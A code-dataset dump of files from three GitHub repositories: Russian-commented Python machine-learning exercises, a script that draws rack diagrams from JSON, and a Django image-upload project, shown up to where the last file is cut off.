[ { "alpha_fraction": 0.6806346774101257, "alphanum_fraction": 0.7050447463989258, "avg_line_length": 29.922077178955078, "blob_id": "fac0cd402897555be8a4acf0d9e4a6cb64f6764e", "content_id": "b1b3ce3dfe2744b36a8468ca095c554ee861147a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3856, "license_type": "no_license", "max_line_length": 77, "num_lines": 77, "path": "/01/01-3.py", "repo_name": "c4e8ece0/pyml", "src_encoding": "UTF-8", "text": "# ГЕНЕРАЦИЯ СЛУЧАЙНОЙ МАТРИЦЫ\r\n# Сгенерируйте матрицу, состоящую из 1000 строк и 50 столбцов, элементы\r\n# которой являются случайными из нормального распределения N(1,10).\r\n\r\n# Функция для генерации чисел из нормального распределения: np.random.normal\r\n# Параметры:\r\n# loc: среднее нормального распределения (в нашем случае 1)\r\n# scale: стандартное отклонение нормального распределения (в нашем случае 10)\r\n# size: размер матрицы (в нашем случае (1000, 50))\r\n\r\nimport numpy as np\r\nX = np.random.normal(loc=1, scale=10, size=(1000, 50))\r\n#print X\r\nexit\r\n\r\n# НОРМИРОВКА МАТРИЦЫ\r\n# Произведите нормировку матрицы из предыдущего задания: вычтите из каждого\r\n# столбца его среднее значение, а затем поделите на его стандартное\r\n# отклонение.\r\n\r\n# Функция для вычисления среднего: np.mean\r\n# Функция для вычисления стандартного отклонения: np.std\r\n\r\n# Первый параметр — матрица, для которой производятся вычисления. 
Также\r\n# полезным будет параметр axis, который указывает, по какому измерению\r\n# вычисляются среднее и стандартное отклонение (если axis=0, то по\r\n# столбцам, если axis=1, то по строкам; если его не указывать, то данные\r\n# величины будут вычислены по всей матрице).\r\n\r\nm = np.mean(X, axis=0)\r\nstd = np.std(X, axis=0)\r\nX_norm = ((X - m) / std)\r\n#print X_norm\r\n\r\n\r\n# ОПЕРАЦИИ НАД ЭЛЕМЕНТАМИ МАТРИЦЫ\r\n\r\n# Выведите для заданной матрицы номера строк, сумма элементов в которых\r\n# превосходит 10.\r\n\r\n# Функция для подсчета суммы: np.sum\r\n# Аргументы аналогичны функциям np.mean и np.std.\r\n\r\n# К матрицам можно применять логические операции, которые будут применяться\r\n# поэлементно. Соответственно, результатом такой операции будет матрица\r\n# такого же размера, в ячейках которой будет записано либо True, либо False.\r\n# Индексы элементов со значением True можно получить с помощью функции\r\n# np.nonzero.\r\n\r\nZ = np.array([[4, 5, 0],\r\n [1, 9, 3],\r\n [5, 1, 1],\r\n [3, 3, 3],\r\n [9, 9, 9],\r\n [4, 7, 1]])\r\n\r\nr = np.sum(Z, axis=1)\r\nprint np.nonzero(r > 10)\r\n\r\n# Объединение матриц\r\n\r\n# Сгенерируйте две единичные матрицы (т.е. с единицами на диагонали) размера\r\n# 3x3. 
Соедините две матрицы в одну размера 6x3.\r\n\r\n# Функция для генерации единичной матрицы: np.eye\r\n# Аргумент: число строк (или, что эквивалентно, столбцов).\r\n\r\n# Функция для вертикальной стыковки матриц: np.vstack((A, B))\r\n\r\n# Код для самопроверки\r\n\r\nA = np.eye(3)\r\nB = np.eye(3)\r\nprint A\r\nprint B\r\nAB = np.vstack((A, B))\r\nprint AB\r\n" }, { "alpha_fraction": 0.7149321436882019, "alphanum_fraction": 0.7265675663948059, "avg_line_length": 40.97222137451172, "blob_id": "94713744dd55e3032ba0bb1c25ef92fd1c901538", "content_id": "6950e519de90e794fc3a2a89b6a4511785c9f984", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2187, "license_type": "no_license", "max_line_length": 122, "num_lines": 36, "path": "/01/01-6-titanic.py", "repo_name": "c4e8ece0/pyml", "src_encoding": "UTF-8", "text": "# 1. Загрузите выборку из файла titanic.csv с помощью пакета Pandas.\r\nimport pandas\r\nimport numpy as np\r\n\r\ndata = pandas.read_csv('titanic.csv', index_col='PassengerId')\r\n\r\n# 2. Оставьте в выборке четыре признака: класс пассажира (Pclass),\r\n# цену билета (Fare), возраст пассажира (Age) и его пол (Sex).\r\n\r\ndata.drop(['PassengerId', 'SibSp', 'Name', 'Parch', 'Ticket', 'Cabin', 'Embarked'], inplace=True, axis=1, errors='ignore')\r\n\r\n# 3. Обратите внимание, что признак Sex имеет строковые значения.\r\n# 4. Выделите целевую переменную — она записана в столбце Survived.\r\n# 5. В данных есть пропущенные значения — например, для некоторых пассажиров\r\n# неизвестен их возраст. Такие записи при чтении их в pandas принимают\r\n# значение nan. Найдите все объекты, у которых есть пропущенные признаки,\r\n# и удалите их из выборки.\r\ndata = data.dropna(axis=0)\r\ndata = data.replace({'male': 1, 'female': 2})\r\nY = data[\"Survived\"]\r\ndata.drop(['Survived'], inplace=True, axis=1, errors='ignore')\r\nprint data.tail()\r\n\r\n# 6. 
Обучите решающее дерево с параметром random_state=241 и остальными\r\n# параметрами по умолчанию.\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nclf = DecisionTreeClassifier(random_state=241)\r\nclf.fit(data, Y)\r\n\r\n# 7. Вычислите важности признаков и найдите два признака с наибольшей\r\n# важностью. Их названия будут ответами для данной задачи (в качестве\r\n# ответа укажите названия признаков через запятую или пробел, порядок\r\n# не важен).\r\nimportances = clf.feature_importances_\r\nprint importances # Age Fare\r\n" }, { "alpha_fraction": 0.6535804271697998, "alphanum_fraction": 0.6695979833602905, "avg_line_length": 34.59770202636719, "blob_id": "d07c8994699b8bf889cc7dfbe1abdfeb839a9491", "content_id": "da1ba84cbe3bd9d1f421aba1880aba9312e8aa2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4539, "license_type": "no_license", "max_line_length": 86, "num_lines": 87, "path": "/01/01-4-pandas.py", "repo_name": "c4e8ece0/pyml", "src_encoding": "UTF-8", "text": "# Пример загрузки данных в Pandas:\r\n# src https://www.kaggle.com/c/titanic/data\r\n\r\nimport pandas\r\n\r\ndata = pandas.read_csv('titanic.csv', index_col='PassengerId')\r\n\r\n# Данные будут загружены в виде DataFrame, с помощью которого можно\r\n# удобно работать с ними. В данном случае параметр\r\n# index_col='PassengerId’\r\n# означает, что колонка PassengerId задает нумерацию строк данного\r\n# датафрейма\r\n\r\n# Для того, чтобы посмотреть что представляют из себя данные, можно\r\n# воспользоваться несколькими способами:\r\n\r\n# 1. более привычным с точки зрения Python (если индекс указывается\r\n# только один, то производится выбор строк):\r\ndata[:10]\r\n\r\n# 2. или же воспользоваться методом датафрейма:\r\ndata.head()\r\n\r\n# Один из способов доступа к столбцам датафрейма — использовать\r\n# квадратные скобки и название столбца:\r\ndata['Pclass']\r\n# print data['Pclass'].value_counts()\r\n\r\n# 1. 
Какое количество мужчин и женщин ехало на корабле? В качестве ответа приведите\r\n# два числа через пробел.\r\nprint \"1 --------------------------------\\n\"\r\nprint\"Sex:\\n\"\r\nprint data['Sex'].value_counts() # 577 314\r\n\r\n# 2. Какой части пассажиров удалось выжить? Посчитайте долю выживших пассажиров.\r\n# Ответ приведите в процентах (число в интервале от 0 до 100, знак процента не нужен).\r\nprint \"\\n\\n2 --------------------------------\\n\"\r\ntotal = data['Survived'].size*1.0\r\nlive = data['Survived'].sum()*1.0\r\nprint(\"Survive: %d\\n\", live)\r\nprint(\"Total: %d\\n\", total)\r\nprint \"Survived %:\"\r\nprint live/total*100.0\r\n\r\n# 3. Какую долю пассажиры первого класса составляли среди всех пассажиров?\r\n# Ответ # приведите в процентах (число в интервале от 0 до 100, знак процента\r\n# не нужен).\r\nprint \"\\n\\n3 --------------------------------\\n\"\r\nprint data['Pclass'].value_counts()\r\nfc = data['Pclass'].value_counts()[1]*1.0\r\nprint fc/total*100\r\n\r\n# 4. Какого возраста были пассажиры? Посчитайте среднее и медиану возраста\r\n# пассажиров. В качестве ответа приведите два числа через пробел.\r\nprint \"\\n\\n4 --------------------------------\\n\"\r\nprint(\"Mean: %.2f\", data[\"Age\"].mean())\r\nprint(\"Median: %.2f\", data[\"Age\"].median())\r\n\r\n# 5. Коррелируют ли число братьев/сестер с числом родителей/детей?\r\n# Посчитайте корреляцию Пирсона между признаками SibSp и Parch.\r\nprint \"\\n\\n5 --------------------------------\\n\"\r\nprint data.corr(\"pearson\")\r\n\r\n# 6. Какое самое популярное женское имя на корабле? Извлеките из полного\r\n# имени пассажира (колонка Name) его личное имя (First Name). Это\r\n# задание — типичный пример того, с чем сталкивается специалист по анализу\r\n# данных. Данные очень разнородные и шумные, но из них требуется извлечь\r\n# необходимую информацию. 
Попробуйте вручную разобрать несколько значений\r\n# столбца Name и выработать правило для извлечения имен, а также разделения\r\n# их на женские и мужские.\r\nprint \"\\n\\n6 --------------------------------\\n\"\r\n\r\nfrom collections import defaultdict\r\n\r\n\r\ndef leaders(xs, top=100):\r\n counts = defaultdict(int)\r\n for x in xs:\r\n counts[x] += 1\r\n return sorted(counts.items(), reverse=True, key=lambda tup: tup[1])[:top]\r\n\r\ncnt = []\r\nfor index, row in data.iterrows():\r\n for name in row[\"Name\"].split(\" \"):\r\n cnt[len(cnt):] = [name]\r\n\r\nprint leaders(cnt)\r\n" }, { "alpha_fraction": 0.7614991664886475, "alphanum_fraction": 0.7691652178764343, "avg_line_length": 39.92856979370117, "blob_id": "e1331fdbc8df96245aa6d946538c8f8821d83ca9", "content_id": "1042f21db7a25fce3e12a6c60a9d48aa3db9d0ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1773, "license_type": "no_license", "max_line_length": 78, "num_lines": 28, "path": "/01/01-5-decisiontrees.py", "repo_name": "c4e8ece0/pyml", "src_encoding": "UTF-8", "text": "# Одна из особенностей решающих деревьев заключается в том, что они позволяют\r\n# получать важности всех используемых признаков. Важность признака можно\r\n# оценить на основе того, как сильно улучшился критерий качества благодаря\r\n# использованию этого признака в вершинах дерева.\r\n\r\n# РЕАЛИЗАЦИЯ В SCIKIT-LEARN\r\n# В библиотеке scikit-learn решающие деревья реализованы в классах\r\n# sklearn.tree.DecisionTreeСlassifier (для классификации)\r\n# и sklearn.tree.DecisionTreeRegressor (для регрессии). 
Обучение модели\r\n# производится с помощью функции fit.\r\n\r\nimport numpy as np\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nX = np.array([[1, 2], [3, 4], [5, 6]])\r\ny = np.array([0, 1, 0])\r\nclf = DecisionTreeClassifier()\r\nclf.fit(X, y)\r\nimportances = clf.feature_importances_\r\n\r\n# Переменная importances будет содержать массив \"важностей\" признаков. Индекс\r\n# в этом массиве соответствует индексу признака в данных.\r\nprint importances\r\n\r\n# Стоит обратить внимание, что данные могут содержать пропуски. Pandas хранит\r\n# такие значения как nan (not a number). Для того, чтобы проверить, является\r\n# ли число nan'ом, можно воспользоваться функцией np.isnan.\r\nprint np.isnan(X)\r\n" } ]
4
tnaganawa/json-to-rackdiag
https://github.com/tnaganawa/json-to-rackdiag
393ed183bd78057c5b3b3ca4b2a1071e9d675eac
386165ce9184705721c758d62721926430943655
6281a9d9ed56003a2211795c54164e0fd4d37344
refs/heads/master
2021-01-22T21:13:49.505966
2017-03-18T14:48:47
2017-03-18T14:48:47
85,408,171
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7487684488296509, "alphanum_fraction": 0.7512315511703491, "avg_line_length": 29.923076629638672, "blob_id": "daf6ad53aa2dcc44a403c3e88ac0345bf2e5ded9", "content_id": "f1e6ae38237e86030c3d47ee208ad04a3e3325ee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 406, "license_type": "permissive", "max_line_length": 85, "num_lines": 13, "path": "/README.md", "repo_name": "tnaganawa/json-to-rackdiag", "src_encoding": "UTF-8", "text": "# json-to-rackdiag\ncreate rack-diagram from json, which could be added to git repo or searched by kibana\n\n# install\n(tested on centos7) \nsudo pip install blockdiag \nsudo pip install nwdiag \nsudo yum install graphviz \ncd /var/tmp \ngit clone [email protected]:tnaganawa/json-to-rackdiag.git \ncd json-to-rackdiag \npython json-to-rackdiag.py \nfirefox /tmp/json-to-rackdiag.svg /tmp/json-to-rack-pos-diag.svg \n\n\n" }, { "alpha_fraction": 0.607038140296936, "alphanum_fraction": 0.6133221387863159, "avg_line_length": 19.577587127685547, "blob_id": "4258451c6a06937a353524a87b634dd6bb969fe2", "content_id": "99bef7267b4578bb5b4f584ab12ed007cc78ce13", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2387, "license_type": "permissive", "max_line_length": 73, "num_lines": 116, "path": "/json-to-rackdiag.py", "repo_name": "tnaganawa/json-to-rackdiag", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport os\nimport json\n\ntmp_filename_rackpos_diag='/tmp/json-to-rack-pos-diag'\ntmp_filename='/tmp/json-to-rackdiag'\njson_filepath='/var/tmp/json-to-rackdiag/json-to-rackdiag.json'\n\n#####\n\ndef create_str_each_u_from_each_u(rack):\n str_each_u=''\n for each_u in rack['each_u']:\n tmp_each_u=each_u.copy()\n if (not 'serial' in tmp_each_u):\n tmp_each_u['serial']=None\n elif (not 'hostname' in tmp_each_u):\n tmp_each_u['hostname']=None\n str_each_u += 
'{position}:{hostname}\\\\n{serial}\\n'.format(**tmp_each_u)\n return str_each_u\n \n\ndef main():\n \n ##\n # read json\n ##\n with open(json_filepath) as f:\n js=json.load(f)\n\n ##\n # create rack-pos-diagram\n ##\n racks=[]\n (max_rack_x, max_rack_y)=(0, 0)\n for rack in js['racks']:\n if (rack['rack_x'] > max_rack_x):\n max_rack_x = rack['rack_x']\n if (rack['rack_y'] > max_rack_y):\n max_rack_y = rack['rack_y']\n #print (max_rack_x, max_rack_y)\n\n for i in range(max_rack_y):\n racks.append([str() for i in range(max_rack_x)])\n\n #print (racks)\n\n for rack in js['racks']:\n rack_x=rack['rack_x']-1\n rack_y=rack['rack_y']-1\n # print (rack_x, rack_y)\n racks[rack_y][rack_x]=rack['rackname']\n\n #print (racks)\n str_for_racks=''\n for y in range(len(racks)):\n line_of_rack=racks[y]\n str_for_racks+='{'\n for x in range(len(line_of_rack)):\n #print (str_for_racks)\n #print (y, x, racks[y][x])\n str_for_racks += racks[y][x]\n str_for_racks+='|'\n str_for_racks=str_for_racks[:-1]\n str_for_racks+='}|'\n str_for_racks=str_for_racks[:-1]\n\n str_for_rack_position_diagram=\"\"\"\ndigraph structs {{\n node [shape=record]; \n room [ \n label=\"{0}\" \n ]; \n}}\n\"\"\".format(str_for_racks)\n # print (str_for_rack_position_diagram)\n\n with open(tmp_filename_rackpos_diag, 'w') as f:\n f.write(str_for_rack_position_diagram)\n os.system('dot -Tsvg -o {0}.svg {0}'.format(tmp_filename_rackpos_diag))\n\n\n ##\n # create rack-diagram\n ##\n str_each_rack=''\n for rack in js['racks']:\n # rackname, str_each_u\n str_each_u=create_str_each_u_from_each_u(rack)\n str_each_rack += \"\"\"\n rack {{\n 12U;\n description={0};\n {1}\n }}\n \"\"\".format(rack['rackname'], str_each_u)\n \n #print (str_each_rack)\n \n rackdiag=\"\"\"\n rackdiag {{\n ascending;\n {0}\n }}\n \"\"\".format(str_each_rack)\n \n #print (rackdiag)\n \n with open(tmp_filename, 'w') as f:\n f.write(rackdiag)\n os.system('rackdiag -Tsvg {0}'.format(tmp_filename))\n \n\nif __name__ == '__main__':\n main()\n" } ]
2
PeithVergil/django-uploadify
https://github.com/PeithVergil/django-uploadify
8da619429a4c6651eb09d47db5a410e1d50d0e62
1b26c0be4e293e9a4138beea14862dfc7853a570
7db861bff6668e5ac10841eec9e9e1a85ad3ace7
refs/heads/master
2016-09-05T19:46:41.398983
2012-08-05T16:16:53
2012-08-05T16:16:53
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6863207817077637, "alphanum_fraction": 0.6933962106704712, "avg_line_length": 28.275861740112305, "blob_id": "099d224d6b56810dcb3ff2f24f5ddbe71bdd3daa", "content_id": "266ee2b1d9ca9220cfd44a46e8b2191f61f2001e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 848, "license_type": "no_license", "max_line_length": 71, "num_lines": 29, "path": "/imahe/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on May 21, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom imahe.views import Gallery, ImageEditor, ImageViewer, Upload, Crop\n\ngallery = login_required(Gallery.as_view())\nupload = login_required(Upload.as_view())\ncrop = login_required(Crop.as_view())\n\nviewer = login_required(ImageViewer.as_view())\neditor = login_required(ImageEditor.as_view())\n\nupload = csrf_exempt(upload)\n\nurlpatterns = patterns('',\n url(r'^gallery/$', gallery, name='imahe_gallery'),\n url(r'^upload/$', upload, name='imahe_upload'),\n url(r'^crop/$', crop, name='imahe_crop'),\n \n url(r'^view/(?P<pk>\\d+)/$', viewer, name='imahe_viewer'),\n url(r'^edit/(?P<pk>\\d+)/$', editor, name='imahe_editor'),\n)" }, { "alpha_fraction": 0.5699208378791809, "alphanum_fraction": 0.5892699956893921, "avg_line_length": 28.947368621826172, "blob_id": "d32b4bffc20f46ac14f56ed28d945208e0f7b453", "content_id": "d35f9a680ac91aaaf2da255690f9f17c2f417237", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1137, "license_type": "no_license", "max_line_length": 73, "num_lines": 38, "path": "/images/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.http import HttpResponseForbidden\nfrom django.views.generic import ListView, 
View\nfrom django.shortcuts import get_object_or_404\n\nfrom images.models import Image\nfrom uploadify.lib import imaging, utils\n\nclass NewPhotos(ListView):\n template_name = 'images/new-photos.html'\n \n def get_queryset(self):\n images = Image.objects.filter(owner=self.request.user, stats='N')\n return images \n \nclass Crop(View):\n \n def post(self, request, *args, **kwargs):\n if not request.user.is_authenticated():\n return HttpResponseForbidden()\n \n id = request.POST.get('id')\n \n x1 = int(float(request.POST.get('x1')))\n y1 = int(float(request.POST.get('y1')))\n x2 = int(float(request.POST.get('x2')))\n y2 = int(float(request.POST.get('y2')))\n \n img = get_object_or_404(Image, id=id)\n \n imaging.crop(img.image.path, (x1, y1, x2, y2))\n imaging.crop(img.thumb.path, (x1, y1, x2, y2))\n \n img.stats = 'C'\n img.save()\n \n return utils.jsonResponse({\n 'status': 'OK'\n })" }, { "alpha_fraction": 0.6409090757369995, "alphanum_fraction": 0.6545454263687134, "avg_line_length": 19.045454025268555, "blob_id": "0cf24a895a2bd57de4d665d6534df6bf947a8dec", "content_id": "9a3026352f7afdd4ddf987cb50b3d3e93d7f58c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 440, "license_type": "no_license", "max_line_length": 71, "num_lines": 22, "path": "/utils/mixins.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 3, 2012\n\n@author: pvergil\n'''\n\nimport json\n\nfrom django.http import HttpResponse\n\nclass JSONResponseMixin(object):\n response = HttpResponse\n\n def render_to_response(self, context, **kwargs):\n kwargs['content_type'] = 'application/javascript; charset=utf8'\n\n return self.response(\n self.to_json(context), **kwargs\n )\n\n def to_json(self, context):\n return json.dumps(context)" }, { "alpha_fraction": 0.495626837015152, "alphanum_fraction": 0.5034013390541077, "avg_line_length": 21.369565963745117, "blob_id": 
"3b9e3acdce8f128ee284e857699450669eb287be", "content_id": "5cce74778bebb7a54bce56976353f3dab7ed689f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 81, "num_lines": 46, "path": "/accounts/templates/accounts/register.html", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "{% extends \"base.html\" %}\n\n{% block content %}\n<div class=\"row-fluid show-grid\">\n\t<div class=\"span12\">\n\t\t<form method=\"post\" action=\"{% url account_register %}\" class=\"well\">\n\t\t\t{% csrf_token %}\n\t\t\t<ul id=\"registration\" class=\"nostyle\">\n\t\t\t\t<li class=\"fn\">\n\t\t\t\t\t{{ form.fname.label_tag }}\n\t\t\t\t\t{{ form.fname }}\n\t\t\t\t\t{{ form.fname.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li class=\"ln\">\n\t\t\t\t\t{{ form.lname.label_tag }}\n\t\t\t\t\t{{ form.lname }}\n\t\t\t\t\t{{ form.lname.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t{{ form.usrnm.label_tag }}\n\t\t\t\t\t{{ form.usrnm }}\n\t\t\t\t\t{{ form.usrnm.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t{{ form.email.label_tag }}\n\t\t\t\t\t{{ form.email }}\n\t\t\t\t\t{{ form.email.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t{{ form.pass1.label_tag }}\n\t\t\t\t\t{{ form.pass1 }}\n\t\t\t\t\t{{ form.pass1.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t{{ form.pass2.label_tag }}\n\t\t\t\t\t{{ form.pass2 }}\n\t\t\t\t\t{{ form.pass2.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t<input type=\"submit\" name=\"submit\" value=\"Submit\" class=\"btn btn-primary\" />\n\t\t\t\t</li>\n\t\t\t</ul>\n\t\t</form>\n\t</div>\n</div>\n{% endblock content %}\n" }, { "alpha_fraction": 0.7004454135894775, "alphanum_fraction": 0.7004454135894775, "avg_line_length": 34.959999084472656, "blob_id": "28083c6ff464a6ed70e08b90dcb18dd9ec2ab4bc", "content_id": "c5bc71eeb391437ab565e528552c5d1abc625b3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 898, "license_type": "no_license", "max_line_length": 78, "num_lines": 25, "path": "/uploadify/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^adventure/', include('adventure.urls')),\n url(r'^accounts/', include('accounts.urls')),\n url(r'^uploader/', include('uploader.urls')),\n url(r'^images/', include('images.urls')),\n url(r'^imahe/', include('imahe.urls')),\n url(r'^post/', include('post.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n)\n\n# Serve user-uploaded files\nurlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)" }, { "alpha_fraction": 0.6724409461021423, "alphanum_fraction": 0.6818897724151611, "avg_line_length": 29.285715103149414, "blob_id": "20fbd011a6ba474638a7d61b8a0c317a9691d46b", "content_id": "30bad8ebc1dffe7cd205b9c146d881b3baee912a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 635, "license_type": "no_license", "max_line_length": 95, "num_lines": 21, "path": "/accounts/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Apr 28, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\n\nfrom accounts.views import AccountRegister\n\n#error_messages = {\n# 'invalid_login': 'Invalid username or password. 
Note that both fields are case-sensitive.'\n#}\n\nurlpatterns = patterns('',\n url(r'^login/$', 'django.contrib.auth.views.login',\n {'template_name': 'accounts/login.html'}, name='account_login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout',\n {'template_name': 'accounts/logout.html'}, name='account_logout'),\n url(r'^register/$', AccountRegister.as_view(), name='account_register'),\n)" }, { "alpha_fraction": 0.6373626589775085, "alphanum_fraction": 0.6703296899795532, "avg_line_length": 15.636363983154297, "blob_id": "e44dd3bd9e47705e43de863b2cc7f616e07d3fb3", "content_id": "e57b51aef113cbada1be6530c9cf504956873b4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 182, "license_type": "no_license", "max_line_length": 51, "num_lines": 11, "path": "/adventure/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Jun 27, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\n\nurlpatterns = patterns('',\n# url(r'^view/$', view, name='adventure_view')\n)" }, { "alpha_fraction": 0.7419354915618896, "alphanum_fraction": 0.7526881694793701, "avg_line_length": 25.714284896850586, "blob_id": "f630c53a1d67728d989c40e4719a5fee2882537d", "content_id": "6d7f71088a0e41aaa4a1a9af89a29937cc1ac3b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 70, "num_lines": 7, "path": "/utils/__init__.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "import random\nimport string\n\nASCII_CHARS = string.ascii_letters + string.digits \n\ndef get_random_string(length=30):\n return ''.join(random.choice(ASCII_CHARS) for x in xrange(length))" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7305194735527039, "avg_line_length": 17.176469802856445, "blob_id": 
"1110f7fc7dc5627f33e58c41ddc0b0c103ad4235", "content_id": "ab97458b52f00f5a27494d724960d7b606c3eb35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 60, "num_lines": 17, "path": "/imahe/templatetags/uploadify_tags.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 1, 2012\n\n@author: pvergil\n'''\n\nfrom django import template\n\nregister = template.Library()\n\[email protected]_tag('imahe/uploadify_dependencies.html')\ndef uploadify_dependencies():\n return {}\n\[email protected]_tag('imahe/uploadify_button.html')\ndef uploadify_button():\n return {}" }, { "alpha_fraction": 0.6226415038108826, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 29.80645179748535, "blob_id": "ef056c1a242f0769db02f36cb6479f8f4cdd275a", "content_id": "98f7a2d867a50f0ef6aad9f231ec7b89f9767a01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 954, "license_type": "no_license", "max_line_length": 61, "num_lines": 31, "path": "/uploader/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseForbidden\nfrom django.views.generic import View, TemplateView\n\nfrom images.models import Image\n\nclass FileUpload(TemplateView):\n template_name = 'uploader/file-upload.html'\n \n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n \n context['session_nm'] = settings.SESSION_COOKIE_NAME\n context['session_ky'] = request.session.session_key\n \n return self.render_to_response(context)\n \nclass FileUploadHandler(View):\n \n def post(self, request, *args, **kwargs):\n user = request.user\n \n if user.is_authenticated():\n data = request.FILES['Filedata']\n \n image = Image(image=data, thumb=data, owner=user)\n 
image.save()\n \n return HttpResponse()\n else:\n return HttpResponseForbidden()" }, { "alpha_fraction": 0.6418337821960449, "alphanum_fraction": 0.6504297852516174, "avg_line_length": 23.964284896850586, "blob_id": "e1bc9a1a865a460bc254378cd27e6ed0db28cf9a", "content_id": "839682e029ba8f042580e6703c977da43564d7f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 698, "license_type": "no_license", "max_line_length": 68, "num_lines": 28, "path": "/post/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 19, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls import patterns, url\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom post.views import AddImage, AddPost, AllPost, AddView, ViewView\n\n_all = AllPost.as_view()\n_new = AddPost.as_view()\n_img = AddImage.as_view()\n\n_img = csrf_exempt(_img)\n\n_add = login_required(AddView.as_view())\n_view = ViewView.as_view()\n\nurlpatterns = patterns('',\n url(r'^$', _all, name='post_all'),\n url(r'^add/$', _add, name='post_add'),\n url(r'^new/$', _new, name='post_new'),\n url(r'^img/$', _img, name='post_img'),\n url(r'^(?P<pid>\\d+)/$', _view, name='post_view'),\n)" }, { "alpha_fraction": 0.5447698831558228, "alphanum_fraction": 0.5550906658172607, "avg_line_length": 31.600000381469727, "blob_id": "db0bbc33b54cfb6e96bf011c3462552481d5dcd7", "content_id": "f3e7541b3af7c249d82ccb3b5b71c73c10c8a7f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3585, "license_type": "no_license", "max_line_length": 76, "num_lines": 110, "path": "/imahe/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import DetailView, ListView, TemplateView\nfrom 
